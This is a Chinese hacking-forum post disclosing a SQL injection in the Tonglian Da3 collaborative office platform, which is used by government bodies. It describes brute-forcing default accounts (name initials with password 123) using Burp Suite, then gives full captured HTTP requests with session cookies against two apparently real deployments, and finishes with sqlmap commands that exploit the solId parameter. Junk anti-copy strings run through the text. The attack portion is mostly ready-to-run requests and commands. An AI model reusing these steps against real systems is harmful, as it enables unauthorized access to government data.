找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1576|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- s5 e) u- E& W& b3 _6 v) D
1 v* {5 R% N% o8 Y% \+ E9 _

m" f3 a/ ?+ C2 g) m/ i/ O

! b! I- q2 t# g& B4 X T 平台简介:( ]" U% N( D* p+ A" y/ Q' |9 N

6 c7 n7 y8 W# s! R: S

$ E) _+ \4 |0 l8 {" z0 Q   ) U$ c+ m6 Z2 n& x) k

# P, h2 K) b5 j

; |; V2 Y3 H( Y( I3 ?- ?+ H 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" s9 [) w" a9 j5 C# n: r) [& u 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
, l, w+ \, t0 A4 C 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 0 n% H# y: I" D

* H5 n4 n' z6 O* `8 Z6 M

! a' w9 Z$ P. @+ p2 J4 U   8 O& g0 J' k! W7 X4 p% a4 B" H( [

+ b& A) a T: K0 w3 V1 v$ ?

! y0 L0 H" N3 Q' P+ d% l. M: U 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 _3 y) L$ n2 H

- ]2 Y2 H7 l+ W6 d& O+ O

( U* K, e1 T7 t/ }0 y+ V: O   , w h& r* f; \# w

% M( K" G+ J0 p1 y/ B" {* D& v

, ^2 O/ U; O' H$ J1 Q; O' ] http://1.1.1.1:7197/cap-aco/#(案例2-) j/ s: x8 Z4 ]9 V

5 Z; {# U& G2 ]0 J8 a% C

3 a& G( P7 G: @5 B1 e/ | http://www.XXOO.com (案例1-官网网站)1 B# N8 ?: E8 i* M2 h" m6 |

! Q( x- T& F1 w$ \ G0 f& n

3 W$ y0 ^3 q1 i7 ^! ]   6 D8 y( j6 L( [' `% i! ?

; a# Z W, E) z6 j+ e% K7 A

' S' }4 F/ o- z1 q N0 {( m 漏洞详情: - s* B) y) u8 b5 O

/ N8 _& X$ j5 i2 N' y

6 P2 O% g! a2 @, A* v  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试" O7 Q8 Z2 m }% j% _; v1 E+ H

# N1 k" t- ? D. X0 d1 ]

! y; S% F% ~5 a% U      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:: E& h! l1 p: X3 \3 k* @! C9 q

4 h5 f1 s1 A, R: C& K" c

2 X2 I9 r: g* c( Y   . V- u) ^3 L+ Z" e

$ ?; S* k" p" u& T ]+ J- b4 D

& T* b' S) |% g, M7 n   ) V% G, P% y" g8 }- n! Y

: ~: o7 A$ U9 s. m! A; `$ ~1 Y

# `' B( E3 C8 Z. B R- s status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:8 B9 f+ _1 F; G* j+ a/ ^1 I

6 C" H$ ^! S; y+ O$ G$ Q

: n: F* _7 Z3 W; g0 I& w5 A 1、案例1-官方网站 . D/ Z; m; ~& T2 H* ~! k# X

' p9 }0 a: ^4 B' F1 }2 g# a, u" v" \

# n! [1 v- D5 n GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 0 V1 U' R3 m! S* \3 ]$ r2 L

. c/ R# E( \0 ]+ m+ w9 v

; p" R" R+ c- m' p' P; m% ? Host: www.XXOO.com. z# l6 X; _( |9 }, [2 m

# ~& s0 l {0 U( t6 w; h

^6 ~! n# R( U Proxy-Connection: Keep-Alive9 C) n6 @8 z: F) q! a4 ^

( B5 J& H+ B8 N; V

4 Z; Z9 W" @# m8 Z2 |) G Accept: application/json, text/javascript, */*; q=0.01& c; O6 K) C/ r7 Y$ Y$ R M% ~' ~

; p; \. P' i0 f! j8 p5 w2 G

# d6 R( J; _! n5 k- K) c+ n8 W; z Accept-Language: zh-CN+ K8 R4 [: Q5 R5 b/ _

! d# G/ o1 Q- s$ y. p1 _& i' g7 E

- n/ U) @% p. B' t Content-Type: application/json 7 ?) g5 f4 R- f9 Y3 P* ~1 x% \

' }7 y: U5 t- p* n2 F

9 ?8 W& \7 j, b: k. q3 o% ~ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko# l- t7 W& Q' W4 {1 W- w$ `8 t; P' e

6 w" P2 @& S. {5 R

4 W) Q( u, }* C/ T0 Z6 w, [' w, v X-Requested-With: XMLHttpRequest [' S# H; [( o" F0 M

/ U' A) C. i1 R( `) s1 r$ w+ \- V$ Y

: }) \ W& P/ p0 B F Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 / z) o1 n5 q- `3 ~$ h2 X

, m! Z5 \! ]; G) y( A o0 N" g

$ K5 @1 o( P! L Accept-Encoding: gzip, deflate, sdch ) a" W5 \7 }% f

# `' ]1 x3 `5 B S7 ]) W

; b8 U) }* ~8 n0 s9 j0 ? Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e # x4 r. a Y" }" ?

) _) c" }3 m) Y" ]& ], {, q$ d l' m

s3 L8 p$ w$ I: ~1 b; N, g1 m 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: ' F8 i8 u- S ` D" @ G3 \! d% p

4 B4 ~9 W' u- w9 J& K

6 q. z) s2 ~/ Q) n   % \. p, ?7 L! X4 v. U

& i4 ]) l0 c4 V& P- Y

/ A0 s1 v, W# Z7 n9 c& O  1 E$ k# T, I% e. `: \. \, [

& b* u+ _% S( j+ ^3 z' r& ]

/ W/ j$ D; r" V  ( ^) N9 `1 t' } j, _5 g% m

% v5 t1 H4 q! t0 t

4 t5 j" s* x- ]4 }# j, A   n4 X; C' Q: t8 n# n

$ d1 D8 m1 Z) L/ V" y4 l- m

, H! }, R3 [. u6 K+ p7 D7 U1 `  / B5 w( N: K1 E- ^

# n* r& r4 u6 a

8 ?# k' C3 ?, w# \/ S& x 2、案例2-某天河云平台6 c1 r5 n; ]' Z0 u, y& F- ~

+ w+ X1 x" a3 q9 h: X& H

. g. Q9 ? P1 g2 h a; R4 e# [& I GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 - n8 h P" h! N4 H

5 M% l% q, h c" M

{8 K) t: s: c5 [' w# ] Host: 1.1.1.:7197" j* `+ n% R% i4 L

2 Z0 d3 Q& J4 n$ V4 i) o1 ~" \

" M$ c0 c- u8 U* t6 N/ q' F, y1 w6 r Accept: application/json, text/javascript, */*; q=0.01 5 m, n& T) E7 O

7 b6 F% T7 X, P% f. A* @7 x

) N4 r: U5 @( [" ^ w& x X-Requested-With: XMLHttpRequest' L$ j3 j4 @8 n2 G; x5 I

) }: l3 }- ]2 F5 o$ C% X

' H u7 y( s( r% |: Z User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0' F+ ?3 p+ h' }) ]7 Y# G$ s5 i; K

% H2 Y, g- n! b: }, p- G& y& _

% W; Y& z! }' w$ p( L' _+ C$ L Content-Type: application/json; b0 d- k" w7 ]; |1 m- ~

0 W! K J- f' s% N0 I* g4 z' q

4 s6 c2 A$ {. s9 p; D Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 ) o3 q9 u) \! e! `# U

* K z. f& ~9 p9 m2 Z5 K/ ^

5 T7 V. l; a& A: e+ q& B Accept-Language: zh-CN,zh;q=0.8+ x6 M/ V7 x- c+ @2 L

. ~5 v) Q: z" F9 W

' k$ |4 E7 _: W. j0 u Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=14 y' T9 l7 G A. r* s5 K( v( R

/ @5 Z4 A$ K' P" |, }

, B: \8 p& @/ s% k$ R% p1 J3 }; D0 K7 @ Connection: close % M3 u; t* p" e6 w6 [

7 s4 b9 d, g2 S. t

: D' e- { d3 P) X 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:1 t" W% m3 ^+ l- s% d; `

; K* M- x* W8 H, d/ ?: @' h2 T; `

$ v! F+ q2 r) y* o! Q   ; P* M9 x9 V# L

! `2 ]- }- X u, v8 z0 d

: I# [- P, q% p/ g. l
: K* N! {$ q. \* t2 q. }, C# A

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表